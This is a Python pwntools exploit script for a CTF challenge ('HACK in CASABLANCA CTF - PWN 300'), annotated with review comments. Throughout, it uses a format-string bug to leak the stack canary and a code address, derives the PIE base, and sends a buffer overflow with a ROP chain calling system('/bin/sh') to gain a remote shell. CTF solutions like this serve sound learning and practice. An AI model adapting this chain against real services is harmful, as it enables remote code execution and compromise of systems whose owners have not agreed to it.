HACK in CASABLANCA CTF - PWN 300
from pwn import *
_author_ = "ABDELJALIL NOUIRI"  # NOTE(review): the conventional module attribute is __author__ (double underscores)
# Connects to the challenge service at import time (module-level side effect);
# every function below talks to this one connection.
r = remote("172.21.2.200",5555)
# Offsets inside the challenge binary. The binary appears to be
# position-independent: base_addr is derived at runtime from a leaked code
# address, and these offsets are added to it to get absolute addresses.
# NOTE(review): the same four values are re-typed as literals further down
# (base_addr / poprdi / systemplt / binsh); use these names there instead.
func_offset = 0x0000000000000B30
systemplt_offset = 0x000000000000960
binsh_offset = 0x0000000000001002
poprdi_offset = 0x0000000000000FD3
def leak_addr(offset):
    """Read one stack word back from the remote process via its format-string bug.

    Drives the service's text menu: option 1 appears to store *offset* (a
    printf-style directive such as "%9$p") as the input string, option 2
    appears to print it back through a printf-family call, and the hex value
    after the ':' on the second response line is parsed.

    Args:
        offset: the format directive string to submit, e.g. "%9$p".
    Returns:
        The leaked word as an int.
    Raises:
        IndexError/ValueError if the response line does not contain a
        ':'-separated hex value (the service replied with something
        unexpected, or the receive timed out and returned partial data).

    The target-side defect this relies on is user input reaching printf as the
    format argument; the fix there is a fixed format string (printf("%s", buf)).
    """
    r.recvuntil("option :")
    r.sendline("1")
    r.recvuntil("!")
    r.sendline(offset)
    r.recv()
    r.sendline("2")
    # First line of the option-2 response is discarded; the value is on the next one.
    r.recvline()
    # Expected shape: "<label>: 0x..." -> take the text after ':' and parse as hex.
    # NOTE(review): written for Python 2 pwntools (str); on Python 3 recvline()
    # returns bytes and split(":") would need b":" — confirm the intended interpreter.
    leak = int(r.recvline().split(":")[1].strip(),16)
    return leak
def exploit(pld):
    """Submit *pld* as the option-1 input and hand the connection to the user.

    Args:
        pld: the raw payload to send (built at module level below from the
            leaked canary and the computed gadget addresses).
    Side effects: drains pending output, sends the payload, then blocks in
    r.interactive() until the session is closed; nothing is returned.
    """
    r.recv()
    r.sendline("1")
    r.recvuntil("!")
    r.sendline(pld)
    r.interactive("shell $")
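# --- module-level driver: runs on import ---
# Two format-string reads: stack slot 9 holds the canary and slot 8 a code
# pointer inside the binary (as assumed by the original script; confirm
# against the target's frame layout if the service changes).
canary = leak_addr("%9$p")
func_addr = leak_addr("%8$p")
# Recover the load base from the leaked code address, then resolve the
# gadgets through the offsets declared at the top of the file — previously
# these were duplicated here as literals, so a change to one copy would
# silently desync the other.
base_addr = func_addr - func_offset
poprdi = base_addr + poprdi_offset
systemplt = base_addr + systemplt_offset
binsh = base_addr + binsh_offset
log.info("CANARY : " + hex(canary))
log.info("BASE : " + hex(base_addr))
# Overflow layout: 520 bytes of filler up to the canary slot, the leaked
# canary (so the stack protector check passes), one word for what is
# presumably the saved-rbp slot (value arbitrary), then pop rdi; "/bin/sh";
# system@plt. Canary and PIE only hold up as long as neither value leaks,
# which is why the format-string read above is the real root cause.
payload = "A" * 520
payload += p64(canary)
payload += p64(0x1)
payload += p64(poprdi)
payload += p64(binsh)
payload += p64(systemplt)
exploit(payload)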